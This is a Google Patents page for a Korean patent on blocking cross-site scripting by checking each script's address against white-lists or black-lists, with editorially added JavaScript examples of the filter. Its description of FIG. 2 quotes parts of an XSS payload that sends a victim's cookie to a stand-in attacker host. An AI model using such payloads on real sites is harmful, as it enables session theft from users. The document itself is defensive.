KR101305755B1 - Apparatus and method for filtering execution of script based on address - Google Patents

Publication number: KR101305755B1
Authority: KR (South Korea)
Prior art keywords: list, script, web page, terminal, addresses
Application number: KR1020120016876A
Other languages: Korean (ko)
Inventor: 임을규, 장표
Original Assignee: 한양대학교 산학협력단
Application filed by 한양대학교 산학협력단
Priority to KR1020120016876A
Application granted
Publication of KR101305755B1

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING; COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F16/00 Information retrieval; Database structures therefor; File system structures therefor
    • G06F16/90 Details of database functions independent of the retrieved data types
    • G06F16/95 Retrieval from the web
    • G06F16/958 Organisation or management of web site content, e.g. publishing, maintaining pages or automatic linking
    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/30 Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
    • H04L63/306 Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information intercepting packet switched data communications, e.g. Web, Internet or IMS communications

Abstract

Apparatus and methods are provided for filtering script execution. Whether or not the script included in the web page is executed is determined based on a match between the script's address and the addresses in the list. The list is generated based on the information in the web page or the information stored in the terminal. The list can be a white-list or a black-list for script execution. The list can be applied on a web page or web site basis.

Description

Device and method for filtering script execution based on address {APPARATUS AND METHOD FOR FILTERING EXECUTION OF SCRIPT BASED ON ADDRESS}

The present invention relates to an apparatus and method for filtering script execution, and more particularly, to an apparatus and method for determining whether to execute a script based on an address of a script.

Web browsers are becoming increasingly important applications for personal computers (PCs) and smart phones.

However, web browsers can be attacked in many ways. An example of an attack on a web browser is Cross-Site Scripting (XSS), a cyber attack that has already become a big issue worldwide.

Web sites can provide dynamic web pages as well as the simple static web pages of the past. The server of the web site may receive an input value from the user's web browser, process the input value, and then display the generated information back to the user. A dynamic web page is a web page that shows information generated from the user's input after that input has been processed.

A malicious user can enter code that causes a malicious script to run, rather than normal content. The web site's server then generates a web page containing code that can execute the malicious script. When another user requests the web page, the web page is sent from the server to that user's personal computer or similar device. The other user's web browser loads the web page and executes the malicious script contained within it. The malicious script performs malicious actions. As an example of a malicious action, the malicious script may transmit the other user's information (e.g., a cookie of the web browser) to the malicious user's computer.

Existing solutions to XSS attacks have a number of problems. Traditional solutions have low usability. For existing solutions to operate effectively, both the provider of the web service and the user of the web service must have knowledge of information security. In other words, existing solutions are difficult for users to operate without additional professional training.

Korean Patent Publication No. 10-2010-0053056 (published Aug. 02, 2011) provides a method for processing a document that is executed on a computing device and includes executable text. The document processing method may include: 1) determining, when the document is processed or while the document is being processed, whether the executable text in the document is derived from and/or affected by untrusted content, and 2) if the executable text is derived from or is affected by untrusted content, identifying the executable text as untrusted content.

An embodiment may provide an apparatus and a method for limiting script execution on a web page or web site basis.

An embodiment may provide an apparatus and a method for determining whether to execute a script based on an address of the script.

According to an aspect, a method of processing a web page by a terminal is provided, the method comprising: receiving the web page from a server, generating a list including one or more addresses based on information in the web page, identifying a script in the web page, determining whether to execute the script based on a match between the address of the script and the list, and executing the script when execution of the script is determined.

The determining may include determining execution of the script if an address matching the address of the script exists among the one or more addresses.

The determining may further include querying a user whether to execute the script if an address matching the address of the script does not exist among the one or more addresses, and determining the execution of the script if the response to the query indicates execution of the script.

The determining may include determining execution of the script if there is no address matching the address of the script among the one or more addresses.

Generating the list including the one or more addresses may include identifying a tag in the web page that includes text representing the list and generating the list based on the text.

The tag may be in a header of the web page.

The generating of the list including the one or more addresses may further include reading information related to the determination of whether to execute the script from the storage of the terminal and generating the list based on the information.

The list may be applied for each web page.

The list may be applied to each server that provides a web service.

The generating of the list may include: generating a web page-list including one or more addresses based on information in the web page; generating a terminal-list including one or more addresses based on information, read from a storage of the terminal, related to determining whether to execute a script; generating the list by merging the web page-list and the terminal-list if the web page-list and the terminal-list do not contradict each other; and using the web page-list as the list if the web page-list and the terminal-list conflict with each other.

If the web page-list and the terminal-list are both white-lists or both black-lists, the web page-list and the terminal-list do not contradict each other. If one of the web page-list and the terminal-list is a white-list and the other is a black-list, the web page-list and the terminal-list contradict each other.

According to another aspect, a terminal is provided that includes a transceiver for receiving a web page from a server and a processor for executing a web browser that outputs the web page, wherein the processor identifies a script in the web page, generates a list including one or more addresses based on the information in the web page, determines whether to execute the script based on a match between the address of the script and the list, and executes the script when execution of the script is determined.

The processor may determine execution of the script if an address matching the address of the script exists among the one or more addresses.

The processor may determine the execution of the script if no address among the one or more addresses matches the address of the script.

The processor may identify a tag in the web page that includes text representing the list and generate the list based on the text.

The terminal may further include a storage unit that stores information related to determining whether to execute the script.

The processor may receive the information from the storage unit and generate the list based on the information.

According to another aspect, a recording medium is provided on which a program for processing a web page is recorded, the program including code for generating a list containing one or more addresses based on information in the loaded web page, code for determining whether to execute a script in the loaded web page based on a match between the address of the script and the list, and code for causing the script to be executed when execution of the script is determined.

An apparatus and method are provided for limiting script execution on a web page or website basis.

An apparatus and method are provided for determining whether to execute a script based on the address of the script.

FIG. 1 illustrates an example of an XSS attack method.
FIG. 2 illustrates an example of malicious script code used for an XSS attack.
FIG. 3 is a block diagram of a terminal according to an embodiment.
FIG. 4 illustrates a web page processing method of restricting execution of a script, according to an exemplary embodiment.
FIG. 5 illustrates list generation and a method of determining a script to be executed based on the generated list, according to an example.
FIG. 6 is a flowchart illustrating a list generating method according to an example.
FIG. 7 is a flowchart illustrating a method of determining whether to execute a script according to an example.

In the following, embodiments will be described in detail with reference to the accompanying drawings. Like reference symbols in the drawings denote like elements.

Hereinafter, the terms “Uniform Resource Locator (URL)” and “Uniform Resource Identifier (URI)” are used in the same sense and may be interchanged with each other.

Hereinafter, a device capable of executing a web browser, such as a personal computer and a smart phone, will be referred to as a terminal. A device that provides a web page displayed within a web browser is named a server. The browser or terminal running the browser receives the web page from the server and outputs the web page in the browser.

FIG. 1 illustrates an example of an XSS attack method.

In step 110, the server sends the first web page to the first terminal of the malicious user.

In step 120, the first terminal outputs the transmitted first web page. The output first web page is a web page that can receive a text string or the like from a user through a text box.

In step 130, the malicious user inputs, as a string, code representing the execution of a malicious script. Hereinafter, a malicious user who performs an XSS attack is referred to as an attacker, and the code indicating execution of the malicious script is referred to as malicious script code. The malicious script may reside on a server used by the attacker. Therefore, the malicious script code may include information indicating the address of the malicious script.

In step 140, a string representing malicious script code is transmitted from the first terminal to the server.

In step 150, the server generates a second web page that contains malicious script code.

In step 160, the server transmits the second web page to the second terminal of a general user.

In step 170, the second terminal outputs the transmitted second web page. As the second web page is output, the browser of the second terminal executes the malicious script code.

An example of malicious script code is described in detail with reference to FIG. 2 below.

FIG. 2 illustrates an example of malicious script code used for an XSS attack.

In the malicious script code of FIG. 2, the tags '<script>' and '</script>' indicate that the content (i.e., text or string) between the tags is script to be executed. 'malicious.com' can represent the address of the server used by the attacker. 'malicious.com/GetCookie.asp' can represent the address of the script used by the attacker. '?cookie="+document.cookie; window.open(url, width=0, height=0)' may mean input values or user information to be passed to the script.

When the user's web browser outputs a page containing malicious script code, the web browser may execute the malicious script code of FIG. 2. The malicious script may not display any information in the web browser. Thus, even though the user's information has been transmitted to the attacker, the user cannot recognize at all that the user has been attacked by XSS and that his information has been leaked.

In order to prevent XSS attacks as described with reference to FIGS. 1 and 2, a method is needed that can limit the execution of scripts contained within web pages.

FIG. 3 is a block diagram of a terminal according to an embodiment.

The terminal 300 may include a transceiver 310, a processor 320, and a storage 330.

The transceiver 310 may exchange data such as a web page, an input value, and script code with an external entity such as a web server. The transceiver 310 may be a network interface, a networking chip, or a networking module.

The processor 320 may execute an application such as a web browser and a database.

The storage unit 330 may be a storage that stores data necessary for the operation of the terminal 300. The storage unit 330 may be a physical storage medium such as a RAM, a hard disk drive (HDD), or a solid state drive (SSD), and may include a data structure such as a table or a database.

FIG. 4 illustrates a web page processing method of restricting execution of a script, according to an exemplary embodiment.

In operation 410, the transceiver 310 of the terminal 300 may receive a web page from the server 400.

In steps 420 through 450, the processor 320 of the terminal 300 may process a web page. Here, the processing of the web page may mean outputting the received web page in the browser of the terminal.

In step 420, the processor 320 may generate a list. The web page may include information used to generate the list. The processor 320 may generate a list based on the information in the received web page. The list can be used to determine whether to execute a script in the web page. The list may include one or more addresses. According to one aspect, the processor 320 may execute the script only if there is an address matching the address of the script among the one or more addresses in the list. That is, the list can be a white-list for script execution. According to another aspect, the processor 320 may execute the script only when there is no address matching the address of the script among the one or more addresses in the list. That is, the list can be a black-list for script execution. Specific methods of generating the list are described in detail below with reference to FIGS. 5 and 6.

Here, a match between two addresses (i.e., one of the one or more addresses in the list and the address of the script) may mean 1) that both addresses are the same, 2) that one of the two addresses is a part (e.g., a prefix) of the other address, or 3) that the Internet Protocol addresses (IP addresses) corresponding to both addresses are the same.
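The three kinds of address match described above can be sketched as follows. This is an added example, not code from the patent: the function names, the injected resolver and every address are constructed, and the prefix test is done on the parsed origin and path rather than on the raw string so that a list entry does not match a different host whose name merely begins with the same characters.

```javascript
// Added example: address matching for a script filter (hypothetical names).
// All addresses below use reserved example domains and are constructed.

// Split an address into comparable parts; null when it cannot be parsed.
function parseAddress(address, pageAddress) {
  try {
    const u = new URL(address, pageAddress); // resolves relative script addresses
    return { origin: u.origin, host: u.hostname, path: u.pathname };
  } catch (err) {
    return null;
  }
}

// 1) The two addresses are the same. Assumption: query string and fragment
//    are not part of the script's address and are ignored.
function sameAddress(entry, script) {
  return entry.origin === script.origin && entry.path === script.path;
}

// 2) The list entry is a prefix of the script address. The origin must be
//    equal and the path prefix must end on a "/" boundary.
function prefixOf(entry, script) {
  if (entry.origin !== script.origin) return false;
  if (!script.path.startsWith(entry.path)) return false;
  return entry.path.endsWith("/") ||
         script.path.length === entry.path.length ||
         script.path[entry.path.length] === "/";
}

// 3) Both host names correspond to the same IP address. `resolver` is an
//    injected lookup (host name -> IP string) so the example runs offline.
//    Hosts that share an address (shared hosting, CDNs) all match this way.
function sameIp(entry, script, resolver) {
  const a = resolver(entry.host);
  const b = resolver(script.host);
  return a !== undefined && a === b;
}

// True when the script address matches the list entry in any enabled way.
function matchAddress(entryAddress, scriptAddress, options = {}) {
  const entry = parseAddress(entryAddress);
  const script = parseAddress(scriptAddress, options.pageAddress);
  if (!entry || !script) return false; // unparsable addresses never match
  if (sameAddress(entry, script) || prefixOf(entry, script)) return true;
  return typeof options.resolver === "function" &&
         sameIp(entry, script, options.resolver);
}

// Plain string-prefix comparison, kept only for contrast with prefixOf().
function naivePrefixMatch(entryAddress, scriptAddress) {
  return scriptAddress.startsWith(entryAddress);
}
```

With a white-list entry of `https://cdn.example.com`, `naivePrefixMatch` accepts a script on `cdn.example.com.other.example`, while `matchAddress` rejects it because the origins differ.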

In step 430, the processor 320 may identify the script within the web page.

In step 440, the processor 320 may determine whether to execute the identified script based on a match between the script's address and the list. For example, if the address of the script is the same as one of the one or more addresses in the list, the processor 320 may execute the identified script.

The processor 320 may determine whether a script having a specific address is executed without the above matching. For example, if the address of the web page and the address of the script match each other, the processor 320 may determine execution of the script. For example, if the address of the script matches the address of an application programming interface (API) providing service, the processor 320 may determine execution of the script.

Specific methods of determining whether to execute a script are described in detail with reference to FIGS. 5 and 7 below.

In operation 450, the processor 320 may determine whether to execute the script. If it is determined that the script is to be executed, step 460 may be performed. If it is determined that the script is not to be executed, the script may be discarded and the procedure may be terminated.

In operation 460, the processor 320 may execute the script when it is determined to execute the script.

FIG. 5 illustrates list generation and a method of determining a script to be executed based on the generated list, according to an example.

The web browser 510 may include a script filter 512 and a script engine 514. The script filter 512 may be a module or code that determines whether to execute a script. The script engine 514 may be a module or code that executes a script. The processor 320 may execute a web browser 510, a script filter 512, and a script engine 514. Thus, all operations described below as being performed by web browser 510, script filter 512, or script engine 514 may be considered to be executed by processor 320.

The script filter 512 may be an application of the terminal 300 or a plug-in of the web browser 510. The script filter 512 may include 1) code for generating a list containing one or more addresses, 2) code for identifying a script within a loaded web page, 3) code for determining whether to execute the script based on a match between the script's address and the list, and 4) code that, if the execution of the script is determined, causes the script to be executed by the web browser 510 (i.e., the script engine 514).

The web browser 510 may load the web page 520.

The web browser 510 may identify the script within the loaded web page. Here, the script may be code (e.g., '<script>' and '</script>' tags) indicating execution of the script. As scripts in the web page 520, a first script 526 in the header 522 and a second script 528 outside the header 522 are illustratively shown.

The script filter 512 may determine whether to execute the identified script. The script filter 512 may determine whether to execute the script based on a match between the script address and the list. The script filter 512 may generate a list based on the first list information 524 and/or the second list information 532. The first list information 524 may refer to the information in the received web page described above in step 420 of FIG. 4.

The first list information 524 may be present in the loaded web page 520. For example, the first list information 524 may include text representing a list, and may include a tag indicating that the text represents a list. Here, the tag may be a predetermined string or a pair of strings (e.g., '<script-address-list>' and '</script-address-list>'). The tag indicates information on the list, and may be agreed in advance between the provider of the web service and the producer of the web browser (or of the plug-in of the web browser). That is, the first list information 524 may be a tag including text indicating a list in the web page 520. The first list information 524 can be in the header 522 of the web page 520. The script filter 512 may generate a list based on the text representing the list in the first list information 524.

The web page 520 may be generated by a provider of a web service (eg, a web page designer or web page developer). Therefore, the provider may control whether to execute the script included in the web page 520 by inserting the first list information 524 in the web page 520. Some of the content of the dynamic page may be generated based on information input by a malicious user and not a provider. Thus, the script in the dynamically generated web page 520 may be generated or inserted by a malicious user other than the provider. As described above with reference to FIG. 1, the address of such a script may be associated with a server used by a malicious user. Therefore, the provider may control whether to execute the script that is not inserted by the provider through the first list information 524.

The first list information 524 may be shared by one or more web pages provided by a web server. Web pages can be written to include specific files. The specific file may include first list information 524. Thus, if the first list information 524 in a specific file is changed or updated, the above change or update may be applied to all web pages in the web server collectively.

The provider can manage the addresses of scripts used by web pages in the web site provided by the provider, and can update the first list information 524 whenever a script using a specific address is added to the web page 520. The update can be performed by an automated tool.

The second list information 532 may exist in the database 530. Here, the database 530 may refer to the storage unit 330 described above with reference to FIG. 3 or to data managed by the storage unit 330.

The second list information 532 may be information related to determining whether to execute the script. For example, the second list information 532 may be text representing a list. The script filter 512 may generate a list based on the second list information 532.

The user of the terminal 300 may generate the second list information 532 and store the generated second list information 532 in the database 530. Accordingly, the user may control whether to execute the script included in the web page 520 by generating, changing, or updating the second list information 532.

The script filter 512 may apply the list to each web page 520. For example, the second list information may provide information related to determining whether to execute different scripts for each web page 520.

The script filter 512 may apply the list to each server that provides a web service. For example, the second list information may provide information related to determining whether to execute different scripts for each server. In addition, the script filter 512 may use the first list information in the first web page of the specific web server to determine whether to execute the script in the second web page of the web server.

In the following, generation of the list is described in more detail with reference to FIG. 6.

The script filter 512 may determine whether to execute the script based on the generated list. The script filter 512 can use the generated list as a white-list or a black-list. For example, when the list is used as a white-list, the script filter 512 may determine execution of the script if there is an address that matches the address of the script among the one or more addresses in the list. When the list is used as a black-list, the script filter 512 may determine to execute the script if none of the one or more addresses in the list matches the address of the script.

In the following, execution of the script is described in more detail with reference to FIG. 7.

FIG. 6 is a flowchart illustrating a list generating method according to an example.

Step 420 of generating the list, described above with reference to FIG. 4, may include all or part of the following steps 610 to 650. The following steps 610 to 650 may be performed by the processor 320 or the script filter 512.

At step 610, first list information 524 may be identified within the web page 520.

In step 615, a web page-list may be generated based on the first list information 524. The web page-list may be the list described above with reference to FIG. 5.

In operation 620, the second list information 532 may be read from the storage 330 of the terminal 300.

In step 625, the terminal-list may be generated based on the second list information 532. The terminal-list may be the list described above with reference to FIG. 5.

In one aspect of the invention, the above-described steps 620 and 625 may be selectively performed only when the first list information 524 does not exist in the web page 520.

In steps 630 to 650 below, a list may be generated based on a web page-list and/or a terminal-list (i.e., first list information 524 and/or second list information 532).

In step 630, it may be determined whether the web page-list and the terminal-list are in conflict with each other. For example, if the web page-list and the terminal-list are both white-lists (or both black-lists), the two lists may be considered not to contradict each other. On the other hand, if one of the web page-list and the terminal-list is a white-list and the other is a black-list, the two lists may be considered to contradict each other. If the web page-list and the terminal-list do not contradict each other, step 640 may be performed. Step 650 may be performed if the web page-list and the terminal-list conflict with each other.

In step 640, if the web page-list and the terminal-list do not contradict each other, the list may be generated by merging the web page-list and the terminal-list. That is, the list may be generated by merging the one or more addresses included in the web page-list and the one or more addresses included in the terminal-list. For example, if the web page-list and the terminal-list are both white-lists, the script can be executed if an address matching the address of the script exists among the one or more addresses in the web page-list or the one or more addresses in the terminal-list. Thus, the list may include both the one or more addresses that the web page-list includes and the one or more addresses that the terminal-list includes.

In step 650, if the web page-list and the terminal-list conflict with each other, one of the web page-list and the terminal-list may be selected as the list. For example, if the web page-list is a white-list and the terminal-list is a black-list, the web page-list may be used as the list. That is, the web page-list generated based on the first list information 524 set by the provider may be considered to have a higher priority than the terminal-list generated based on the second list information 532 set by the user of the terminal 300. The priority difference between the web page-list and the terminal-list may be due to the assumption that the provider of the web service will be more aware of the web service it provides than the user of the terminal 300.

FIG. 7 is a flowchart illustrating a method of determining whether to execute a script according to an example.

Determining whether to execute the script described above with reference to FIG. 4 may include all or some of the following steps 710 to 760. The following steps 710 to 760 may be performed by the processor 320 or the script filter 512.

In step 710, the type of list may be checked. If the list is a white-list, step 720 may be performed. If the list is a black-list, step 730 may be performed.

In step 720, it may be checked whether there is an address that matches the address of the script among the one or more addresses in the list. If there is an address in the list that matches the address of the script, execution of the script may be determined at step 750. If none of the one or more addresses in the list matches the address of the script, step 740 may be performed.

In step 730, it may be checked whether there is no address matching the address of the script among the one or more addresses in the list. If none of the one or more addresses in the list matches the address of the script, execution of the script may be determined at step 750. If an address in the list matches the address of the script, steps 740 to 744 can be performed.

Steps 740 to 744 may be performed if the execution of the script cannot be determined by the list. For example, when the list is a white-list, steps 740 through 744 may be performed if no address among the one or more addresses in the list matches the address of the script.

In step 740, the user may be queried whether to execute the script. A message asking the user whether to execute the script may be output on the terminal 300. The query may be for a professional user who can precisely control whether or not the script is executed.

In step 742, a response to the query may be received from the user.

At step 744, it may be checked whether the response to the query indicates the execution of the script. Execution of the script may be determined at step 750 if the response to the query indicates execution of the script. If the response to the query does not indicate the execution of the script, then it may be determined in step 760 not to run the script.

Steps 740 to 744 may be optional. For example, if the execution of the script cannot be determined by the list, it may be determined immediately at step 760, without querying the user, not to execute the script.
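The list generation of FIG. 6 and the decision flow of FIG. 7 can be put together as follows. This is an added example, not code from the patent: the `type="white|black"` attribute and the whitespace-separated address text inside `<script-address-list>` are assumptions (the description names only the tag pair), and the sample page, function names and addresses are constructed.

```javascript
// Added example: list generation (steps 610-650) and the execution decision
// (steps 710-760). A real filter would work on the browser's parsed DOM; the
// regular expressions here keep the sketch self-contained.

const SAMPLE_PAGE = `<html><head>
<script-address-list type="white">
  https://www.example.com/js/
  https://api.example.org/
</script-address-list>
<script src="https://www.example.com/js/app.js"></script>
</head><body>
<p>user comment:</p>
<script src="https://unlisted.example/collect.js"></script>
</body></html>`;

// Steps 610-615: build the web page-list from the tag in the page header.
// Only a tag inside <head> is honoured, following the header placement above.
function parsePageList(html) {
  const head = /<head\b[^>]*>([\s\S]*?)<\/head>/i.exec(html);
  if (!head) return null;
  const tag = /<script-address-list\b([^>]*)>([\s\S]*?)<\/script-address-list>/i.exec(head[1]);
  if (!tag) return null;
  // Assumption: a missing type attribute means white-list.
  const type = /\btype\s*=\s*["']?black/i.test(tag[1]) ? "black" : "white";
  return { type, addresses: tag[2].split(/\s+/).filter(Boolean) };
}

// Steps 630-650: merge lists of the same type; on conflict the web page-list wins.
function buildList(pageList, terminalList) {
  if (!pageList) return terminalList || null;
  if (!terminalList) return pageList;
  if (pageList.type === terminalList.type) { // step 640
    const merged = new Set([...pageList.addresses, ...terminalList.addresses]);
    return { type: pageList.type, addresses: [...merged] };
  }
  return pageList; // step 650
}

// Exact or directory-prefix match; a short stand-in for the filter's matcher.
function simpleMatch(entry, scriptAddress) {
  return scriptAddress === entry ||
         (entry.endsWith("/") && scriptAddress.startsWith(entry));
}

// Steps 710-760. `askUser` is optional; without it the script is not executed
// whenever the list alone does not allow it.
function decideExecution(list, scriptAddress, askUser) {
  const matched = list.addresses.some((entry) => simpleMatch(entry, scriptAddress));
  const allowed = list.type === "white" ? matched : !matched; // steps 720 / 730
  if (allowed) return true; // step 750
  if (typeof askUser === "function") { // steps 740-744
    return askUser(scriptAddress) === true;
  }
  return false; // step 760
}

// Identify scripts that have an address and decide each one. With no list from
// either source the page is left unfiltered (an assumption of this sketch).
function filterPage(html, terminalList, askUser) {
  const list = buildList(parsePageList(html), terminalList);
  const decisions = [];
  const re = /<script\s[^>]*?\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const execute = list ? decideExecution(list, m[1], askUser) : true;
    decisions.push({ address: m[1], execute });
  }
  return decisions;
}
```

For the constructed page, the script under `https://www.example.com/js/` is executed and the one from `unlisted.example` is discarded unless a terminal white-list entry or a user response allows it.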

Through the web page processing method according to the above-described embodiment, the user of the terminal 300 can be protected from XSS without being aware that the method is applied and without any separate knowledge of XSS. The user of the terminal 300 may be provided with the above web page processing method by updating a web browser or installing a plug-in. In addition, by using a special tag for identifying the first list information, compatibility between a browser using the embodiment of the present invention and a default browser can be maintained.

Embodiments include a computer readable medium having program instructions for performing various computer implemented operations. In particular, the present embodiment includes a computer readable medium having recorded thereon a program including code for generating a list including one or more addresses based on information in a loaded web page, code for determining whether to execute a script in the loaded web page based on a match between the address of the script and the list, and code for causing the script to be executed when the execution of the script is determined. The program according to the present embodiment may be a PC-based program or a dedicated mobile terminal application (for example, a smart phone application or a feature phone VM (virtual machine)). The program or application may be a web browser or a plug-in of a web browser. It may be configured to be executed by at least one processor running in the terminal.

The computer readable medium may include program instructions, data files, data structures, etc. alone or in combination. The program instructions to be recorded on the medium may be those specially designed and configured for the embodiments or may be available to those skilled in the art of computer software. In addition, the above-described file system can be recorded in a computer-readable recording medium.

As described above, the technical details described in the embodiments can be variously changed and modified. Therefore, the scope of the invention should not be limited to the described embodiments, but should be determined by the appended claims and their equivalents.

300: terminal
310: Transmitting /
320: processor
330:
510: web browser
512: script filter
514: script engine
520: Web page
524: first list information
532: second list information

Claims (17)

  1. In the method for the terminal to process the web page,
    Receiving the web page from a server;
    Generating a list comprising one or more addresses based on the information in the web page;
    Identifying a script within the web page;
    Determining whether to execute the script based on a match between the script address and the list; and
    Executing the script when the execution of the script is determined,
    Wherein generating the list including the one or more addresses comprises:
    Identifying a tag within the web page that includes text representing the list; and
    Generating the list based on the text
    Including, the web page processing method.
  2. The method of claim 1,
    Wherein the determining comprises:
    Determining execution of the script if one of the one or more addresses matches the address of the script
    Including, the web page processing method.
  3. The method of claim 2,
    Wherein the determining comprises:
    Querying a user whether the script is executed if an address matching the address of the script does not exist among the one or more addresses; and
    Determining execution of the script if a response to the query indicates execution of the script
    Further comprising, the web page processing method.
  4. The method of claim 1,
    Wherein the determining comprises:
    Determining execution of the script if one of the one or more addresses does not match an address of the script
    Including, the web page processing method.
  5. delete
  6. The method of claim 1,
    And the tag is in a header of the web page.
  7. The method of claim 1,
    Generating the list including the one or more addresses,
    Reading information related to determining whether to execute a script from the storage of the terminal; and
    Generating the list based on the information
    Further comprising, the web page processing method.
  8. The method of claim 1,
    The list is applied to each web page, web page processing method.
  9. The method of claim 1,
    And the list is applied to each server that provides a web service.
  10. The method of claim 1,
    Generating the list,
    Generating a web page-list comprising one or more addresses based on the information in the web page;
    Generating a terminal-list including one or more addresses based on information related to determining whether to execute a script read from a repository of the terminal;
    Generating the list by merging the web page-list and the terminal-list if the web page-list and the terminal-list do not contradict each other; and
    Using the web page-list as the list if the web page-list and the terminal-list conflict with each other.
    Including, the web page processing method.
  11. The method of claim 10,
    If the web-page list and the terminal-list are both white-list or black-list, the web page-list and the terminal-list do not contradict each other, and one of the web page-list and the terminal-list is white The web page-list and the terminal-list are inconsistent with each other if the list and the other are the black-list.
  12. A receiving unit for receiving a web page from the server; and
    A processor that executes a web browser that outputs the web page,
    Wherein the processor identifies a script within the web page, generates a list including one or more addresses based on the information in the web page, determines whether to run the script based on a match between the script's address and the list, and, if the execution of the script is determined, executes the script,
    Wherein the processor identifies a tag in the web page that includes text representing the list and generates the list based on the text.
  13. delete
  14. delete
  15. delete
  16. delete
  17. In a recording medium in which a program for processing a web page is recorded,
    Code for generating a list comprising one or more addresses based on the information in the loaded web page;
    Code for determining whether to execute a script in the loaded web page based on a match between the address of the script and the list; and
    Code that causes the script to execute when it is determined to execute the script,
    Wherein the code for generating the list comprising the one or more addresses identifies a tag within the web page that includes text representing the list, and generates the list based on the text,
    A computer-readable recording medium, in which a program is recorded.
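
The execution decision of claims 1 to 4 and the list-merging rule of claims 10 and 11, as an added JavaScript example that is not part of the patent text. The `<script-list>` tag name, its `type` attribute, the space-separated address format, matching at origin granularity and the shape of the terminal-list object are assumptions; the claims only require a tag in the web page that includes text representing the list.

```javascript
// Added illustration: tag name, "type" attribute, list format and origin-level matching are assumptions.
const LIST_TAG = /<script-list\s+type="(white|black)"\s*>([^<]*)<\/script-list>/i;

// Reduce an address to its origin; opaque or unparseable addresses give null.
function originOf(address, base) {
  try { const o = new URL(address, base).origin; return o === 'null' ? null : o; }
  catch { return null; }
}

// Web page-list: read the list tag from the page header (claims 1 and 6).
function parsePageList(html, pageUrl) {
  const head = (html.match(/<head[^>]*>([\s\S]*?)<\/head>/i) || [])[1] || '';
  const m = head.match(LIST_TAG);
  if (!m) return null;
  const origins = m[2].split(/\s+/).map(a => a && originOf(a, pageUrl)).filter(Boolean);
  return { type: m[1].toLowerCase(), origins: new Set(origins) };
}

// Claims 10-11: same kind of list -> merge; white vs. black -> the web page-list wins.
function effectiveList(pageList, terminalList) {
  if (!pageList) return terminalList || null;
  if (!terminalList || pageList.type !== terminalList.type) return pageList;
  return { type: pageList.type, origins: new Set([...pageList.origins, ...terminalList.origins]) };
}

// Claims 2-4: returns 'execute', 'ask-user' (white-list miss) or 'block'.
function decide(list, scriptSrc, pageUrl) {
  if (!list) return 'execute';            // assumption: no list means no filtering
  const origin = originOf(scriptSrc, pageUrl);
  if (origin === null) return 'block';    // assumption: unresolvable address fails closed
  const listed = list.origins.has(origin);
  if (list.type === 'white') return listed ? 'execute' : 'ask-user';
  return listed ? 'block' : 'execute';
}

// Apply the filter to every external script in a page.
function filterPage(html, pageUrl, terminalList) {
  const list = effectiveList(parsePageList(html, pageUrl), terminalList);
  return [...html.matchAll(/<script[^>]*\ssrc="([^"]+)"/gi)]
    .map(m => [m[1], decide(list, m[1], pageUrl)]);
}
// Constructed sample page: the third script stands in for markup injected via XSS.
const PAGE_URL = 'https://shop.example/item?id=7';
const PAGE = `<html><head>
<script-list type="white">https://shop.example https://cdn.example</script-list>
</head><body><script src="/js/app.js"></script><script src="https://cdn.example/lib.js"></script>
<script src="https://injected.example/x.js"></script></body></html>`;
console.log(filterPage(PAGE, PAGE_URL, null));
```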
KR1020120016876A 2012-02-20 2012-02-20 Appatatus and method for filtering execution of script based on address KR101305755B1 (en)

Publications (1)

Publication Number Publication Date
KR101305755B1 true KR101305755B1 (en) 2013-09-17

Family

ID=49455472

Country Status (1)

Country Link
KR (1) KR101305755B1 (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
KR101820043B1 (en) 2016-12-15 2018-01-18 주식회사 수산아이앤티 Mobile terminal identification, and business model using mobile terminal identification

Legal Events

Date Code Title Description
A201 Request for examination
E902 Notification of reason for refusal
E701 Decision to grant or registration of patent right
GRNT Written decision to grant
FPAY Annual fee payment

Payment date: 20160705

Year of fee payment: 4

LAPS Lapse due to unpaid annual fee